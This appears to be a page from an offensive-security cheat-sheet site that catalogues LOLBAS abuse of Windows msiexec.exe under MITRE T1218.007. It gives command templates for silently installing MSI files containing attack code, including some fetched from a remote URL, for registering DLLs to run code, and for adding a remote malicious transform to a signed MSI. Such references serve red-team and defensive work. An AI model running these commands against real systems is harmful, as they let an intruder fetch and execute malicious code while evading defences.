🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Msiexec.exe

Msiexec.exe

Used by Windows to execute msi files

Execute

Execute custom made msi file with attack code

msiexec /quiet /i {PATH:.msi}

Installs the target .MSI file silently. — MITRE: T1218.007 — Privileges: User

Execute custom made msi file with attack code from remote server

msiexec /q /i {REMOTEURL}

Installs the target remote & renamed .MSI file silently. — MITRE: T1218.007 — Privileges: User

Execute dll files

msiexec /y {PATH_ABSOLUTE:.dll}

Calls DllRegisterServer to register the target DLL. — MITRE: T1218.007 — Privileges: User

Execute dll files

msiexec /z {PATH_ABSOLUTE:.dll}

Calls DllUnregisterServer to un-register the target DLL. — MITRE: T1218.007 — Privileges: User

Install trusted and signed msi file, with additional attack code as transformation file, from a remote server

msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb

Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. — MITRE: T1218.007 — Privileges: User